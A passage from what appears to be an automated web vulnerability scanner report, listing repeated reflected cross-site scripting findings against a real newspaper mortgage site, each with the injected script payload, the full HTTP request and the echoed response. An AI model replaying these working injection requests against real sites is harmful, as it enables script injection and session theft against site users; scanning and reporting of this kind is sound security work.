<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/129f6bd\"><script>alert(1)</script>e08417cca0d/feed/" /> ...[SNIP]...
1.281. http://mortgage.ocregister.com/2008/12/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/12/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 581fa"><script>alert(1)</script>91923fa8a10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 581fa\"><script>alert(1)</script>91923fa8a10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/12/?581fa"><script>alert(1)</script>91923fa8a10=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99492
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/12/?581fa\"><script>alert(1)</script>91923fa8a10=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d904e"><script>alert(1)</script>ffe0d03125f was submitted in the REST URL parameter 1. This input was echoed as d904e\"><script>alert(1)</script>ffe0d03125f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009d904e"><script>alert(1)</script>ffe0d03125f/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009d904e\"><script>alert(1)</script>ffe0d03125f/01/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17425"><script>alert(1)</script>04dd09f1aff was submitted in the REST URL parameter 2. This input was echoed as 17425\"><script>alert(1)</script>04dd09f1aff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/0117425"><script>alert(1)</script>04dd09f1aff/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0117425\"><script>alert(1)</script>04dd09f1aff/feed/" /> ...[SNIP]...
1.284. http://mortgage.ocregister.com/2009/01/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2009/01/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dfd6"><script>alert(1)</script>57a08275a9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7dfd6\"><script>alert(1)</script>57a08275a9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/01/?7dfd6"><script>alert(1)</script>57a08275a9d=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/01/?7dfd6\"><script>alert(1)</script>57a08275a9d=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aae10"><script>alert(1)</script>bd79c7c5eb was submitted in the REST URL parameter 1. This input was echoed as aae10\"><script>alert(1)</script>bd79c7c5eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009aae10"><script>alert(1)</script>bd79c7c5eb/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009aae10\"><script>alert(1)</script>bd79c7c5eb/02/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14452"><script>alert(1)</script>9b71eedb14c was submitted in the REST URL parameter 2. This input was echoed as 14452\"><script>alert(1)</script>9b71eedb14c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/0214452"><script>alert(1)</script>9b71eedb14c/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0214452\"><script>alert(1)</script>9b71eedb14c/feed/" /> ...[SNIP]...
1.287. http://mortgage.ocregister.com/2009/02/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2009/02/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a46c5"><script>alert(1)</script>3744f3c36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a46c5\"><script>alert(1)</script>3744f3c36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/02/?a46c5"><script>alert(1)</script>3744f3c36=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 100730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/02/?a46c5\"><script>alert(1)</script>3744f3c36=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b293"><script>alert(1)</script>6ae8dc92a5 was submitted in the REST URL parameter 1. This input was echoed as 6b293\"><script>alert(1)</script>6ae8dc92a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20096b293"><script>alert(1)</script>6ae8dc92a5/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20096b293\"><script>alert(1)</script>6ae8dc92a5/03/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caa27"><script>alert(1)</script>d1503a6c825 was submitted in the REST URL parameter 2. This input was echoed as caa27\"><script>alert(1)</script>d1503a6c825 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/03caa27"><script>alert(1)</script>d1503a6c825/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/03caa27\"><script>alert(1)</script>d1503a6c825/feed/" /> ...[SNIP]...
1.290. http://mortgage.ocregister.com/2009/03/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2009/03/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 572c6"><script>alert(1)</script>7284a87d77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 572c6\"><script>alert(1)</script>7284a87d77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/03/?572c6"><script>alert(1)</script>7284a87d77=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/03/?572c6\"><script>alert(1)</script>7284a87d77=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f1d"><script>alert(1)</script>e69b8dc3898 was submitted in the REST URL parameter 1. This input was echoed as e5f1d\"><script>alert(1)</script>e69b8dc3898 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009e5f1d"><script>alert(1)</script>e69b8dc3898/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009e5f1d\"><script>alert(1)</script>e69b8dc3898/04/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a43"><script>alert(1)</script>1a1ab7a0c99 was submitted in the REST URL parameter 2. This input was echoed as b1a43\"><script>alert(1)</script>1a1ab7a0c99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/04b1a43"><script>alert(1)</script>1a1ab7a0c99/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/04b1a43\"><script>alert(1)</script>1a1ab7a0c99/feed/" /> ...[SNIP]...
1.293. http://mortgage.ocregister.com/2009/04/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2009/04/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d59d"><script>alert(1)</script>7366da0a954 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d59d\"><script>alert(1)</script>7366da0a954 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/04/?3d59d"><script>alert(1)</script>7366da0a954=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106435
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/04/?3d59d\"><script>alert(1)</script>7366da0a954=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36880"><script>alert(1)</script>180f3a1c883 was submitted in the REST URL parameter 1. This input was echoed as 36880\"><script>alert(1)</script>180f3a1c883 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200936880"><script>alert(1)</script>180f3a1c883/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200936880\"><script>alert(1)</script>180f3a1c883/05/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e2f"><script>alert(1)</script>c8e7e3442e9 was submitted in the REST URL parameter 2. This input was echoed as f9e2f\"><script>alert(1)</script>c8e7e3442e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/05f9e2f"><script>alert(1)</script>c8e7e3442e9/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643
